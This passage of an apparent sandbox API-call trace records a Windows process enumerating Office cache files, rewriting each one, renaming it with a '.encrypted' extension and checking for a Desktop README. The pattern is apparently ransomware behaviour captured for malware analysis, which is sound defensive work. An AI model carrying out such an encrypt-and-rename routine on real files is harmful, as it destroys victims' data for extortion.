ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f09b0 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0206.346] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0206.347] FindClose (in: hFindFile=0x94f09b0 | out: hFindFile=0x94f09b0) returned 1 [0206.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0206.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0206.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0206.347] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0206.347] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0206.347] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f09b0 [0206.347] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.348] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0206.348] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0206.348] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0206.348] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0206.349] FindNextFileW (in: hFindFile=0x94f09b0, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0206.349] FindClose (in: hFindFile=0x94f09b0 | out: hFindFile=0x94f09b0) returned 1 [0206.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0206.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0206.349] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0206.350] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.351] GetFileType (hFile=0x280) returned 0x1 [0206.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0206.351] GetFileType (hFile=0x280) returned 0x1 [0206.351] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x1861 [0206.351] ReadFile (in: hFile=0x280, lpBuffer=0x22f0344, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x22f0344*, lpNumberOfBytesRead=0x2ee7d4*=0x1861, lpOverlapped=0x0) returned 1 [0206.353] CloseHandle (hObject=0x280) returned 1 [0206.375] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0206.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0206.375] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0206.375] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0206.375] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.377] GetFileType (hFile=0x280) returned 0x1 [0206.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0206.377] GetFileType (hFile=0x280) returned 0x1 [0206.377] WriteFile (in: hFile=0x280, lpBuffer=0x2344b24*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x2344b24*, lpNumberOfBytesWritten=0x2ee7c4*=0x1870, lpOverlapped=0x0) returned 1 [0206.378] CloseHandle (hObject=0x280) returned 1 [0206.378] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0206.378] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0206.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0206.378] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x608f4020, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1870)) returned 1 [0206.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0206.379] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0206.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpFilePart=0x0) returned 0x4a [0206.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0206.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0206.382] GetFileType (hFile=0x280) returned 0x1 [0206.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0206.382] GetFileType (hFile=0x280) returned 0x1 [0206.382] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x30780dd [0206.526] ReadFile (in: hFile=0x280, lpBuffer=0xc551018, nNumberOfBytesToRead=0x30780dd, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0xc551018*, lpNumberOfBytesRead=0x2ee7d4*=0x30780dd, lpOverlapped=0x0) returned 1 [0208.420] CloseHandle (hObject=0x280) returned 1 [0211.963] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0211.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0211.963] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0211.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0211.963] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpFilePart=0x0) returned 0x4a [0211.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0211.963] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0211.968] GetFileType (hFile=0x280) returned 0x1 [0211.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0211.968] GetFileType (hFile=0x280) returned 0x1 [0211.968] WriteFile (in: hFile=0x280, lpBuffer=0x23501018*, nNumberOfBytesToWrite=0x30780e0, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x23501018*, lpNumberOfBytesWritten=0x2ee7c4*=0x30780e0, lpOverlapped=0x0) returned 1 [0219.200] CloseHandle (hObject=0x280) returned 1 [0219.201] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpFilePart=0x0) returned 0x4a [0219.201] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.encrypted", lpFilePart=0x0) returned 0x54 [0219.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0219.201] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x6833ea60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x30780e0)) returned 1 [0219.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0219.202] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.encrypted")) returned 1 [0219.205] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0219.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0219.205] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0219.205] GetFileType (hFile=0x280) returned 0x1 [0219.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0219.205] GetFileType (hFile=0x280) returned 0x1 [0219.206] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x251f [0219.206] ReadFile (in: hFile=0x280, lpBuffer=0x2393cb0, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x2393cb0*, lpNumberOfBytesRead=0x2ee7d4*=0x251f, lpOverlapped=0x0) returned 1 [0219.208] CloseHandle (hObject=0x280) returned 1 [0219.267] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0219.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0219.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0219.267] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0219.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0219.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0219.269] GetFileType (hFile=0x280) returned 0x1 [0219.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0219.269] GetFileType (hFile=0x280) returned 0x1 [0219.269] WriteFile (in: hFile=0x280, lpBuffer=0x23ec400*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x23ec400*, lpNumberOfBytesWritten=0x2ee7c4*=0x2520, lpOverlapped=0x0) returned 1 [0219.270] CloseHandle (hObject=0x280) returned 1 [0219.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpFilePart=0x0) returned 0x4b [0219.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.encrypted", lpFilePart=0x0) returned 0x55 [0219.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0219.271] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x683fd140, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2520)) returned 1 [0219.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0219.271] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.encrypted")) returned 1 [0219.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0219.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, 